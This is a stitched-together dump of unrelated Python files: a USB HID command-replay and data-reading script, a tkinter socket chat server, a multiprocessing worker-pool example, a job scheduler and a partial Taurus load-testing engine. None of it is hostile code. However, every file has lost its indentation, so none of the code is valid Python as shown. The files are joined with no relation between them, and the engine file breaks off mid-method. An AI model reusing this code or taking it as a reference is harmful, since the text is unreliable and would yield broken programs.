# print("special_cmd A -> WRITE_DATA_CMD_PRIME_KEEP_ALIVE")
# device.write(WRITE_DATA)
WRITE_DATA = bytes.fromhex("3f040400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# print("WRITE_DATA: ", WRITE_DATA)
line_cmd = "3f040400000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
WRITE_DATA = bytes.fromhex(line_cmd)
# print("WRITE_DATA: ", WRITE_DATA,len(WRITE_DATA))
# print hex(int(string, base=16))
# print( hex(WRITE_DATA[0]),WRITE_DATA[1],WRITE_DATA[2],WRITE_DATA[3])
line = YAT_format.readline()
# \!(Delay(175))
if "Delay" in line:
digits = re.findall("\d",line)
delay=''.join(digits)
d= int(delay)
print("delay: (",d,") ms to next command")
# Sleep for delay/1000 seconds ---------------------------------------------------------------------
sleep(d/1000)
# ------------------------------------------------------------------------------------------
if "h" in line:
i = i +1
# stop condition after 1774 commands from host
if i>1773:
print(" reached 1774 commands from host!!!")
break
if j < 10 :
print("line #:", j,") ------------------------------------------------------")
elif j<100:
print("line #:", j,") -----------------------------------------------------")
elif j<1000:
print("line #:", j,") ----------------------------------------------------")
else:
print("line #:", j,") ---------------------------------------------------")
j = j+1
a = line
a=a.replace('\\h(', '')
a=a.replace(')', '')
print(a,end='')
b = a.replace(' ', '')
b = b.rstrip()
l=len(b)//2
# print(b,"len=",l,"len_st(l)",len_st(l))
if len_st(l) == "77":
print(" >>>>>>>>>>>>>>>>>>>>>>>>> bad length of payload ??????? >>>>>>>>>>>>>>>>>>>>>>>>>>>")
# b= "3f"+str(l)+b
b= "3f"+len_st(l)+b
len2 = len(b)//2
added_00 = "00"*(64-len2)
command = b + added_00
# uncomment next line if debugging is needed
# print(command)
# print(bytes.fromhex(command))
# print(WRITE_DATA)
device.write(bytes.fromhex(command))
# print(line)
else:
WRITE_DATA = WRITE_DATA_CMD_A
print("special_cmd A -> keep Alive + fast BLE update (every 20 msec)")
# special_cmd = 0
# elif special_cmd == 'M':
# WRITE_DATA = WRITE_DATA_CMD_M
# print("special_cmd M -> moderate BLE update rate every 50 mSec")
# special_cmd = 0
elif special_cmd == 'B':
WRITE_DATA = WRITE_DATA_CMD_B
# device.write(WRITE_DATA)
# print("special_cmd B -> set_BSL_mode --- this will stop HID communication with this GUI")
print("WRITE_DATA: ", WRITE_DATA)
special_cmd = 0
# else:
# WRITE_DATA = DEFAULT_WRITE_DATA
if WRITE_DATA == WRITE_DATA_CMD_B:
break
cycle_time = timer() - time
# print("cycle timer: %.10f" % cycle_time)
# If not enough time has passed, sleep for SLEEP_AMOUNT seconds
sleep_time = SLEEP_AMOUNT - (cycle_time)
# Measure the time
time = timer()
# Sleep for delay/1000 seconds ---------------------------------------------------------------------
# sleep(d/1000)
# ------------------------------------------------------------------------------------------
# Read the packet from the device
value = device.read(READ_SIZE, timeout=READ_TIMEOUT)
# Update the GUI
if len(value) >= READ_SIZE:
# save into file:
analog = [(int(value[i + 1]) << 8) + int(value[i]) for i in LAP_ANALOG_INDEX_LIST]
channel_0 = analog[0]
channel_1 = analog[1]
channel_2 = analog[2]
channel_3 = analog[3]
channel_4 = analog[4]
counter = (int(value[COUNTER_INDEX + 1]) << 8) + int(value[COUNTER_INDEX])
count_dif = counter - prev_counter
#global file1
#if count_dif > 1 :
# L = [ str(counter),", ", str(clicker_analog), ", " , str(count_dif), " <<<<<--- " ,"\n" ]
#else:
# L = [ str(counter),", ", str(clicker_analog), ", " , str(count_dif), "\n" ]
L = [ str(channel_0),", ", str(channel_1), ", " , str(channel_2),", " , str(channel_3),", " , str(channel_4), "\n" ]
#file1.writelines(L)
# no handler for keep alive
handler(value, do_print=do_print)
# print("Received data: %s" % hexlify(value))
Handler_Called = (timer() - handle_time)
if Handler_Called > 0.002 :
# if Handler_Called > 0.02 :
#print("handler called: %.6f" % Handler_Called)
global print_every
print_every = print_every + 1
if print_every >= 500:
print_every = 0
print("time:", time, end="")
print(" Received data: %s" % hexlify(value))
# print("time: %.6f" % time)
handle_time = timer()
prev_counter = counter
# Update the do_print flag
do_print = (timer() - print_time) >= PRINT_TIME
def date2dec(x):
s = "%02x" % x
return s
def handler(value, do_print=False):
if do_print:
print("Received data: %s" % hexlify(value))
# parsing FW version response :
if value[2] == 6 and value[3] == 6 and value[4] == 0 and value[5] == 1:
print("FW friendly version: %s" % hexlify(value))
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0
# b'3f0a06060001 030004060321 d6bb2c3fc2b49c3fe877fecef602fffe5787dedfcf750cfb129efe7ffd7ed60daedefca4f9fff58efc5eb47c237eb5a93dd72f55'
print("")
print("FW version: "+str(value[6])+"." +str(value[7])+"." +str(value[8]))
print("FW date : "+date2dec(value[9])+"/" +date2dec(value[10])+"/20" +date2dec(value[11]))
print(" ")
print(" Please press <Enter> to Exit")
return # do without gui
PROGRESS_BAR_LEN = 300
LONG_PROGRESS_BAR_LEN = 590
def init_parser():
parser = argparse.ArgumentParser(
description="Read the HID data from target board.\nIf no argument is given, the program exits."
)
parser.add_argument(
"-v", "--vendor",
dest="vendor_id",
metavar="VENDOR_ID",
type=int,
nargs=1,
required=False,
help="connects to the device with the vendor ID"
)
parser.add_argument(
"-p", "--product",
dest="product_id",
metavar="PRODUCT_ID",
type=int,
nargs=1,
required=False,
help="connects to the device with that product ID"
)
parser.add_argument(
"-a", "--path",
dest="path",
metavar="PATH",
type=str,
nargs=1,
required=False,
help="connects to the device with the given path"
)
return parser
def main():
global VENDOR_ID
global PRODUCT_ID
PATH = None
# Parse the command line arguments
parser = init_parser()
args = parser.parse_args(sys.argv[1:])
# Initialize the flags according from the command line arguments
avail_vid = args.vendor_id != None
avail_pid = args.product_id != None
avail_path = args.path != None
id_mode = avail_pid and avail_vid
path_mode = avail_path
default_mode = (not avail_vid) and (not avail_pid) and (not avail_path)
if (path_mode and (avail_pid or avail_vid)):
print("The path argument can't be mixed with the ID arguments")
return
if ((not avail_path) and ((avail_pid and (not avail_vid)) or ((not avail_pid) and avail_vid))):
print("Both the product ID and the vendor ID must be given as arguments")
return
if (default_mode):
print("No arguments were given, defaulting to:")
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
id_mode = True
elif (id_mode):
VENDOR_ID = args.vendor_id[0]
PRODUCT_ID = args.product_id[0] #run over with 772 == 0x304
elif (path_mode):
PATH = args.path[0]
else:
raise NotImplementedError
device = None
try:
if (id_mode):
try:
print("try with default device:")
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
except:
print("wrong ID")
print(" ")
# 0x24B3 = 9395
# 0x2005 = 8197
for n in range(7):
if device is None:
try:
# print("try with other device")
VENDOR_ID = 0x24b3 # Simb
PRODUCT_ID = 0x2000 + n # LAP_NEW_CAMERA. is 0x2005
# print("VID = %X PID = %X " % VENDOR_ID, PRODUCT_ID)
print("try with PID = %X " % PRODUCT_ID)
# print("PRODUCT_ID = %X" % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
# device = hid.Device(vid=0x24B3, pid=0x2005)
# print("success vid=0x24B3, pid=0x2005 !!")
except:
print("wrong ID2")
# VENDOR_ID = 2047
# PRODUCT_ID = 304
# 0x2047 = 8263
# 0x304 = 772
# 0x0301 // Product ID (PID) - base for Prime products family
for n in range(len(PRODUCT_ID_types)):
if device is None:
try:
# print("try with other device")
VENDOR_ID = 0x2047 # Texas Instrument
PRODUCT_ID = 0x301 + n # BOARD_TYPE_MAIN is 0x301
print("try with PID = %X " % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
except:
print("wrong ID2")
if device is None:
print("no device attached")
else:
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
if PRODUCT_ID in PRODUCT_ID_types:
print(PRODUCT_ID_types[PRODUCT_ID])
global special_cmd
# if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
if PRODUCT_ID in PRODUCT_ID_types:
special_cmd = 'A'
print("set in init: special_cmd = 'A'")
elif (path_mode):
device = hid.Device(path=PATH)
else:
raise NotImplementedError
# Create thread that calls
threading.Thread(target=main_loop, args=(device,), daemon=True).start()
global WRITE_DATA
if WRITE_DATA == WRITE_DATA_CMD_B:
print("WRITE_DATA == WRITE_DATA_CMD_B")
# print(" Recording Ended !!!")
print(" ")
# print(" Please press <Enter> to Exit")
input()
finally:
# global file1
# file1.close() #to change file access modes
YAT_format.close()
if device != None:
device.close()
if __name__ == "__main__":
main() |
Server_gui.py |
import socket
import time
from datetime import datetime
import threading
import tkinter
from tkinter import Scrollbar, Text, Entry, Button, font
from tkinter.constants import END, NS, VERTICAL
import sys
from threading import Thread, ThreadError
from win10toast import ToastNotifier
Notify = ToastNotifier()
class Server():
def unlock():
try:
threading.Thread(target=Server.connection_manager).start()
except :
pass
def update():
while True:
Server.change_button(str(len(CONNECTED)) +
' USERS IN ROOM : ', 'light green')
time.sleep(5)
def close_app():
try:
for clients_list in CONNECTED:
try:
clients_list.send(
bytes('SERVER WAS CLOSED BY THE HOST', 'utf-8'))
except :
sys.exit()
root.destroy()
sys.exit()
except :
root.destroy()
def pull_message():
while len(CONNECTED) > 0:
time.sleep(1)
for i in CONNECTED:
try:
rec_messages = (i.recv(110232).decode())
print("messahe recived : ", rec_messages)
if rec_messages == 'I':
continue
try:
id_to_remove = int(rec_messages)
print(id_to_remove)
CONNECTED.pop(id_to_remove-1)
Server.change_button(str(PARTICIPANTS[id_to_remove-1]) + " left the room", "pink")
Notify.show_toast("prichat", str(PARTICIPANTS[id_to_remove-1]) + " left the room", duration=1)
PARTICIPANTS.pop(id_to_remove-1)
except:
pass
Notify.show_toast("prichat", rec_messages, duration=1)
MessageWindow.insert(END, rec_messages+'')
except :
pass
def push_message():
"""sending messages to clients"""
outbox_message = MessageBox.get()
if outbox_message == '':
pass
else:
MessageBox.delete(0, "end")
outbox_message = ' : '+outbox_message+" "+datetime.now().strftime("%H:%M:%S")
for client_list in CONNECTED:
MessageWindow.insert(
END, 'YOU '+outbox_message, font.Font(weight="bold"))
client_list.send(bytes(USERNAME+outbox_message+'\n', 'utf-8'))
time.sleep(1)
def change_button(button_text, button_color):
"""change status button"""
try:
Status['text'] = button_text
Status.config(bg=button_color)
except RuntimeError:
pass
def connection_manager():
"""manage the server client connections"""
host_config['state'] = 'disable'
UserNameEntry['state'] = 'disable'
global CONNECTED
global USERNAME
global PARTICIPANTS
CONNECTED = []
try:threading.Thread(target=Server.update).start()
except :pass
PARTICIPANTS = []
port_number = str(host_config.get())[len(Ip)+1:len(Ip)+5]
USERNAME = UserNameEntry.get()
try:
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((Ip, int(port_number)))
server_socket.listen(3)
Server.change_button("CONNECTED TO PORT : " +str(port_number), 'light green')
MessageWindow.config(bg='white')
except:
Server.change_button('COULD NOT CONNECT', 'red')
while True:
connected_client, addr = server_socket.accept()
CONNECTED.append(connected_client)
connected_client.send(bytes(str(str(len(CONNECTED))+str(USERNAME)), 'utf-8'))
print("DATA SEND")
PARTICIPANTS.append(connected_client.recv(110232).decode())
Server.change_button(PARTICIPANTS[len(CONNECTED)-1]+' ENTERED THE ROOM', 'light blue')
try:threading.Thread(target=Server.pull_message).start()
except :pass
def fetch_user_data():
"""get the user hostname and ip"""
return (socket.gethostname(), socket.gethostbyname(socket.gethostname()))
def participation_window():
participants_app = tkinter()
participants_app.title("Participants")
text_box = tkinter.Text(
participants_app, height=13, width=32, font=(12))
text_box.grid(row=0, column=0)
text_box.config(bg='#D9D8D7')
scroll_bar = Scrollbar(participants_app, orient=VERTICAL)
scroll_bar.grid(row=0, column=1, sticky=NS)
text_box.config(yscrollcommand=scroll_bar.set)
scroll_bar.config(command=text_box.yview)
spacing = 0
text_box.insert(END, "participants"+'\n')
text_box.insert(END, " "+'\n')
for clients_list in PARTICIPANTS:
text_box.insert(END, clients_list+'\n')
spacing += 30
text_box['state'] = 'disable'
participants_app.mainloop()
if __name__ == "__main__":
root = tkinter.Tk()
root.title("server")
try:root.iconbitmap("./icon_chat_app.ico")
except :pass
root.geometry("300x391")
root.maxsize(300, 391)
Status = Button(root, text="PRESS TO CONNECT", width=45, height=1,
command=Server.unlock, borderwidth=0)
Status.place(x=0, y=0)
HostName, Ip = Server.fetch_user_data()
host_config = Entry(root)
host_config.place(x=0, y=25, width=150, height=35)
host_config.insert(END, Ip+':9999')
UserNameEntry = Entry(root)
UserNameEntry.place(x=150, y=25, width=151, height=35)
UserNameEntry.insert(END, HostName)
MessageWindow = Text(root, width=38, height=17, bg='grey', borderwidth=0)
MessageWindow.place(y=65, x=0)
MessageBox = tkinter.Entry(root, borderwidth=1)
MessageBox.place(x=0, y=340, width=245, height=47)
SendButton = Button(root, text="send", height=3, width=8,
borderwidth=0, bg='light green', command=Server.push_message)
SendButton.place(x=244, y=340)
root.bind('<Return>', lambda event: Server.push_message)
SendButton = Button(root, text="File", height=3, width=8, borderwidth=0,
bg='light blue', command=Server.push_message)
SendButton.place(x=344, y=340)
root.protocol('WM_DELETE_WINDOW', Server.close_app)
root.mainloop()
|
mp_workers.py | #
# Simple example which uses a pool of workers to carry out some tasks.
#
# Notice that the results will probably not come out of the output
# queue in the same in the same order as the corresponding tasks were
# put on the input queue. If it is important to get the results back
# in the original order then consider using `Pool.map()` or
# `Pool.imap()` (which will save on the amount of code needed anyway).
#
# Copyright (c) 2006-2008, R Oudkerk
# All rights reserved.
#
import time
import random
from multiprocessing import Process, Queue, current_process, freeze_support
#
# Function run by worker processes
#
def worker(input, output):
for func, args in iter(input.get, 'STOP'):
result = calculate(func, args)
output.put(result)
#
# Function used to calculate result
#
def calculate(func, args):
result = func(*args)
return '%s says that %s%s = %s' % \
(current_process().name, func.__name__, args, result)
#
# Functions referenced by tasks
#
def mul(a, b):
time.sleep(0.5*random.random())
return a * b
def plus(a, b):
time.sleep(0.5*random.random())
return a + b
#
#
#
def test():
NUMBER_OF_PROCESSES = 4
TASKS1 = [(mul, (i, 7)) for i in range(20)]
TASKS2 = [(plus, (i, 8)) for i in range(10)]
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for task in TASKS1:
task_queue.put(task)
# Start worker processes
for i in range(NUMBER_OF_PROCESSES):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
print 'Unordered results:'
for i in range(len(TASKS1)):
print '\t', done_queue.get()
# Add more tasks using `put()`
for task in TASKS2:
task_queue.put(task)
# Get and print some more results
for i in range(len(TASKS2)):
print '\t', done_queue.get()
# Tell child processes to stop
for i in range(NUMBER_OF_PROCESSES):
task_queue.put('STOP')
if __name__ == '__main__':
freeze_support()
test()
|
simplequeue.py | import threading
from multiprocessing import Process
from . import runjob, jobid, store
class Scheduler(object):
def __init__(self):
self._lock = threading.Lock()
self._nextjob = threading.Event()
self._jobs = []
self._pending = []
self._info = {}
self._status = {}
self._results = {}
self._jobmonitor = threading.Thread(target=self._run_queue)
self._jobmonitor.start()
self._current_id = None
def _run_queue(self):
while True:
self._nextjob.wait()
with self._lock:
if not self._pending:
self._nextjob.clear()
continue
self._current_id = self._pending.pop(0)
self._status[self._current_id] = 'ACTIVE'
request = self._info[self._current_id]
self._stopping = None
self._current_process = Process(target=runjob.run,
args=(self._current_id,request))
self._current_process.start()
self._current_process.join()
results = runjob.results(self._current_id)
with self._lock:
self._results[self._current_id] = results
self._status[self._current_id] = results['status']
def jobs(self, status=None):
with self._lock:
if status is None:
response = self._jobs[:]
else:
response = [j for j in self._jobs if self._status[j] == status]
return response
def submit(self, request, origin):
with self._lock:
id = int(jobid.get_jobid())
store.create(id)
store.put(id,'request',request)
request['id'] = id
self._jobs.append(id)
self._info[id] = request
self._status[id] = 'PENDING'
self._results[id] = {'status':'PENDING'}
self._pending.append(id)
self._nextjob.set()
return id
def results(self, id):
with self._lock:
return self._results.get(id,{'status':'UNKNOWN'})
def status(self, id):
with self._lock:
return self._status.get(id,'UNKNOWN')
def info(self, id):
with self._lock:
return self._info[id]
def cancel(self, id):
with self._lock:
try: self._pending.remove(id)
except ValueError: pass
if self._current_id == id and not self._stopping == id:
self._stopping = id
self._current_process.terminate()
self._status[id] = 'CANCEL'
def delete(self, id):
self.cancel(id)
with self._lock:
try: self._jobs.remove(id)
except ValueError: pass
self._info.pop(id, None)
self._results.pop(id, None)
self._status.pop(id, None)
store.destroy(id)
|
engine.py | """
Main BZT classes
Copyright 2015 BlazeMeter Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import codecs
import copy
import datetime
import json
import logging
import os
import pkgutil
import re
import shutil
import sys
import threading
import time
import traceback
import uuid
from distutils.version import LooseVersion
import bzt
from bzt import ManualShutdown, get_configs_dir, TaurusConfigError, TaurusInternalException
from bzt.six import string_types, text_type, parse, reraise
from bzt.utils import load_class, BetterDict, ensure_is_dict, dehumanize_time, is_windows, is_linux
from bzt.utils import shell_exec, get_full_path, ExceptionalDownloader, get_uniq_name, HTTPClient, Environment
from .dicts import Configuration
from .modules import Provisioning, Reporter, Service, Aggregator, EngineModule
from .names import EXEC, TAURUS_ARTIFACTS_DIR, SETTINGS
from .templates import Singletone
class Engine(object):
"""
Core entity of the technology, used to coordinate whole process
:type reporters: list[Reporter]
:type services: list[Service]EXEC
:type log: logging.Logger
:type aggregator: bzt.modules.aggregator.ConsolidatingAggregator
:type stopping_reason: BaseException
"""
ARTIFACTS_DIR = "%Y-%m-%d_%H-%M-%S.%f"
def __init__(self, parent_logger):
"""
:type parent_logger: logging.Logger
"""
self.file_search_paths = []
self.services = []
self.__artifacts = []
self.reporters = []
self.artifacts_dir = None
self.log = parent_logger.getChild(self.__class__.__name__)
self.env = Environment(self.log) # backward compatibility
self.shared_env = Environment(self.log) # backward compatibility
self.config = Configuration()
self.config.log = self.log.getChild(Configuration.__name__)
self.modules = {} # available modules
self.provisioning = Provisioning()
self.aggregator = Aggregator(is_functional=False)
self.aggregator.engine = self
self.interrupted = False
self.check_interval = 1
self.stopping_reason = None
self.engine_loop_utilization = 0
self.prepared = []
self.started = []
self.default_cwd = None
self.logging_level_down = lambda: None
self.logging_level_up = lambda: None
self._http_client = None
def configure(self, user_configs, read_config_files=True):
"""
Load configuration files
:type user_configs: list[str]
:type read_config_files: bool
"""
self.log.info("Configuring...")
if read_config_files:
self._load_base_configs()
merged_config = self._load_user_configs(user_configs)
all_includes = []
while "included-configs" in self.config:
includes = self.config.pop("included-configs")
included_configs = [self.find_file(conf) for conf in includes if conf not in all_includes + user_configs]
all_includes += includes
self.config.load(included_configs)
self.config['included-configs'] = all_includes
self.config.merge({"version": bzt.VERSION})
self.get_http_client()
if self.config.get(SETTINGS).get("check-updates", True):
install_id = self.config.get("install-id", self._generate_id())
def wrapper():
return self._check_updates(install_id)
thread = threading.Thread(target=wrapper) # intentionally non-daemon thread
thread.start()
return merged_config
def unify_config(self):
executions = self.config.get(EXEC, [])
if isinstance(executions, dict):
executions = [executions]
self.config[EXEC] = executions
settings = self.config.get(SETTINGS)
default_executor = settings.get("default-executor", None)
prov_type = self.config.get(Provisioning.PROV)
for execution in executions: # type: BetterDict
executor = execution.get("executor", default_executor, force_set=True)
if not executor:
msg = "Cannot determine executor type and no default executor in %s"
raise TaurusConfigError(msg % execution)
reporting = self.config.get(Reporter.REP, [])
for index in range(len(reporting)):
ensure_is_dict(reporting, index, "module")
services = self.config.get(Service.SERV, [])
for index in range(len(services)):
ensure_is_dict(services, index, "module")
modules = self.config.get("modules")
for module in modules:
ensure_is_dict(modules, module, "class")
@staticmethod
def _generate_id():
if os.getenv("JENKINS_HOME"):
prefix = "jenkins"
elif os.getenv("TRAVIS"):
prefix = "travis"
elif any([key.startswith("bamboo") for key in os.environ.keys()]):
prefix = "bamboo"
elif os.getenv("TEAMCITY_VERSION"):
prefix = "teamcity"
elif os.getenv("DOCKER_HOST"):
prefix = "docker"
elif os.getenv("AWS_"):
prefix = "amazon"
elif os.getenv("GOOGLE_APPLICATION_CREDENTIALS") or os.getenv("CLOUDSDK_CONFIG"):
prefix = "google_cloud"
elif os.getenv("WEBJOBS_NAME"):
prefix = "azure"
elif is_linux():
prefix = 'linux'
elif is_windows():
prefix = 'windows'
else:
prefix = 'macos'
return "%s-%x" % (prefix, uuid.getnode())
def prepare(self):
"""
Prepare engine for work, will call preparing of Provisioning and add
downstream EngineModule instances
"""
self.log.info("Preparing...")
self.unify_config()
interval = self.config.get(SETTINGS).get("check-interval", self.check_interval)
self.check_interval = dehumanize_time(interval)
try:
self.__prepare_aggregator()
self.__prepare_services()
self.__prepare_provisioning()
self.__prepare_reporters()
self.config.dump()
except BaseException as exc:
self.stopping_reason = exc
raise
def _startup(self):
modules = self.services + [self.aggregator] + self.reporters + [self.provisioning] # order matters
for module in modules:
self.log.debug("Startup %s", module)
self.started.append(module)
module.startup()
self.config.dump()
def start_subprocess(self, args, env, cwd=None, **kwargs):
if cwd is None:
cwd = self.default_cwd
return shell_exec(args, cwd=cwd, env=env.get(), **kwargs)
def run(self):
"""
Run the job. Calls `startup`, does periodic `check`,
calls `shutdown` in any case
"""
self.log.info("Starting...")
exc_info = exc_value = None
try:
self._startup()
self.logging_level_down()
self._wait()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
exc_value = exc
exc_info = sys.exc_info()
finally:
self.log.warning("Please wait for graceful shutdown...")
try:
self.logging_level_up()
self._shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
if exc_value:
reraise(exc_info, exc_value)
def _check_modules_list(self):
stop = False
modules = [self.provisioning, self.aggregator] + self.services + self.reporters # order matters
for module in modules:
if module in self.started:
self.log.debug("Checking %s", module)
finished = bool(module.check())
if finished:
self.log.debug("%s finished", module)
stop = finished
return stop
def _wait(self):
"""
Wait modules for finish
:return:
"""
prev = time.time()
while not self._check_modules_list():
now = time.time()
diff = now - prev
delay = self.check_interval - diff
self.engine_loop_utilization = diff / self.check_interval
self.log.debug("Iteration took %.3f sec, sleeping for %.3f sec...", diff, delay)
if delay > 0:
time.sleep(delay)
prev = time.time()
if self.interrupted:
raise ManualShutdown()
self.config.dump()
def _shutdown(self):
"""
Shutdown modules
:return:
"""
self.log.info("Shutting down...")
self.log.debug("Current stop reason: %s", self.stopping_reason)
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
for module in modules:
try:
if module in self.started:
module.shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
self.config.dump()
if exc_value:
reraise(exc_info, exc_value)
def post_process(self):
"""
Do post-run analysis and processing for the results.
"""
self.log.info("Post-processing...")
# :type exception: BaseException
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
# services are last because of shellexec which is "final-final" action
for module in modules:
if module in self.prepared:
try:
module.post_process()
except BaseException as exc:
if isinstance(exc, KeyboardInterrupt):
self.log.debug("post_process: %s", exc)
else:
self.log.debug("post_process: %s\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
self.config.dump()
if exc_info:
reraise(exc_info, exc_value)
def create_artifact(self, prefix, suffix):
"""
Create new artifact in artifacts dir with given prefix and suffix
:type prefix: str
:type suffix: str
:return: Path to created file
:rtype: str
:raise TaurusInternalException: if no artifacts dir set
"""
if not self.artifacts_dir:
raise TaurusInternalException("Cannot create artifact: no artifacts_dir set up")
filename = get_uniq_name(self.artifacts_dir, prefix, suffix, self.__artifacts)
self.__artifacts.append(filename)
self.log.debug("New artifact filename: %s", filename)
return filename
def existing_artifact(self, filename, move=False, target_filename=None):
"""
Add existing artifact, it will be collected into artifact_dir. If
move=True, the original file will be deleted
:type filename: str
:type move: bool
:type target_filename: str
"""
self.log.debug("Add existing artifact (move=%s): %s", move, filename)
if self.artifacts_dir is None:
self.log.warning("Artifacts dir has not been set, will not copy %s", filename)
return
new_filename = os.path.basename(filename) if target_filename is None else target_filename
new_name = os.path.join(self.artifacts_dir, new_filename)
self.__artifacts.append(new_name)
if get_full_path(filename) == get_full_path(new_name):
self.log.debug("No need to copy %s", filename)
return
if not os.path.exists(filename):
self.log.warning("Artifact file not exists: %s", filename)
return
if move:
self.log.debug("Moving %s to %s", filename, new_name)
shutil.move(filename, new_name)
else:
self.log.debug("Copying %s to %s", filename, new_name)
shutil.copy(filename, new_name)
def create_artifacts_dir(self, existing_artifacts=(), merged_config=None):
"""
Create directory for artifacts, directory name based on datetime.now()
"""
if not self.artifacts_dir:
artifacts_dir = self.config.get(SETTINGS, force_set=True).get("artifacts-dir", self.ARTIFACTS_DIR)
self.artifacts_dir = datetime.datetime.now().strftime(artifacts_dir)
self.artifacts_dir = get_full_path(self.artifacts_dir)
self.log.info("Artifacts dir: %s", self.artifacts_dir)
os.environ[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
if not os.path.isdir(self.artifacts_dir):
os.makedirs(self.artifacts_dir)
# dump current effective configuration
dump = self.create_artifact("effective", "") # TODO: not good since this file not exists
self.config.set_dump_file(dump)
self.config.dump()
# dump merged configuration
if merged_config:
merged_config.dump(self.create_artifact("merged", ".yml"), Configuration.YAML)
merged_config.dump(self.create_artifact("merged", ".json"), Configuration.JSON)
for artifact in existing_artifacts:
self.existing_artifact(artifact)
def is_functional_mode(self):
return self.aggregator is not None and self.aggregator.is_functional
def __load_module(self, alias):
"""
Load module class by alias
:param alias: str
:return: class
"""
if alias in self.modules:
return self.modules[alias]
mod_conf = self.config.get('modules')
if alias not in mod_conf:
msg = "Module '%s' not found in list of available aliases %s" % (alias, sorted(mod_conf.keys()))
raise TaurusConfigError(msg)
settings = ensure_is_dict(mod_conf, alias, "class")
acopy = copy.deepcopy(settings)
BetterDict.traverse(acopy, Configuration.masq_sensitive)
self.log.debug("Module config: %s %s", alias, acopy)
err = TaurusConfigError("Class name for alias '%s' is not found in module settings: %s" % (alias, settings))
clsname = settings.get('class', err)
self.modules[alias] = load_class(clsname)
if not issubclass(self.modules[alias], EngineModule):
raise TaurusInternalException("Module class does not inherit from EngineModule: %s" % clsname)
return self.modules[alias]
def instantiate_module(self, alias):
"""
Create new instance for module using its alias from module settings
section of config. Thus, to instantiate module it should be mentioned
in settings.
:type alias: str
:rtype: EngineModule
"""
classobj = self.__load_module(alias)
instance = classobj()
assert isinstance(instance, EngineModule)
instance.log = self.log.getChild(alias)
instance.engine = self
settings = self.config.get("modules")
instance.settings = settings.get(alias)
return instance
def find_file(self, filename):
"""
Try to find file or dir in search_path if it was specified. Helps finding files
in non-CLI environments or relative to config path
Return path is full and mustn't treat with abspath/etc.
:param filename: file basename to find
:type filename: str
"""
if not filename:
return filename
if filename.lower().startswith("http://") or filename.lower().startswith("https://"):
parsed_url = parse.urlparse(filename)
downloader = ExceptionalDownloader(self.get_http_client())
self.log.info("Downloading %s", filename)
tmp_f_name, headers = downloader.get(filename)
cd_header = headers.get('Content-Disposition', '')
dest = cd_header.split('filename=')[-1] if cd_header and 'filename=' in cd_header else ''
if dest.startswith('"') and dest.endswith('"') or dest.startswith("'") and dest.endswith("'"):
dest = dest[1:-1]
elif not dest:
dest = os.path.basename(parsed_url.path)
fname, ext = os.path.splitext(dest) if dest else (parsed_url.hostname.replace(".", "_"), '.file')
dest = self.create_artifact(fname, ext)
self.log.debug("Moving %s to %s", tmp_f_name, dest)
shutil.move(tmp_f_name, dest)
return dest
else:
filename = os.path.expanduser(filename) # expanding of '~' is required for check of existence
# check filename 'as is' and all combinations of file_search_path/filename
for dirname in [""] + self.file_search_paths:
location = os.path.join(dirname, filename)
if os.path.exists(location):
if dirname:
self.log.warning("Guessed location from search paths for %s: %s", filename, location)
return get_full_path(location)
self.log.warning("Could not find location at path: %s", filename)
return filename
def _load_base_configs(self):
configs = []
try:
sys.path.insert(0, os.path.curdir) # necessary for development mode (running bzt from curdir)
configs.extend(self._scan_system_configs())
configs.extend(self._scan_package_configs())
finally:
sys.path.pop(0)
configs.sort(key=os.path.basename)
self.log.debug("Base configs list: %s", configs)
if not configs:
self.log.warning("No base configs were discovered")
self.config.load(configs)
def _scan_package_configs(self):
configs = []
for importer, modname, ispkg in pkgutil.iter_modules(path=None):
try:
if not ispkg:
continue
package_path = getattr(importer, 'path', None)
if package_path is None:
continue
index_path = os.path.join(package_path, modname, 'bzt-configs.json')
if not os.path.exists(index_path):
continue
try:
with codecs.open(index_path, 'rb', encoding='utf-8') as fds:
index_configs = json.load(fds)
except (OSError, IOError, ValueError) as exc:
self.log.debug("Can't load package-specific bzt config %s: %s", index_path, exc)
continue
if not isinstance(index_configs, list):
self.log.debug("Error: value of bzt-configs.json should be a list (%s)" % index_path)
continue
for config_name in index_configs:
configs.append(os.path.join(importer.path, modname, config_name))
except BaseException as exc:
self.log.warning("Can't look for package configs in package %r: %s", modname, str(exc))
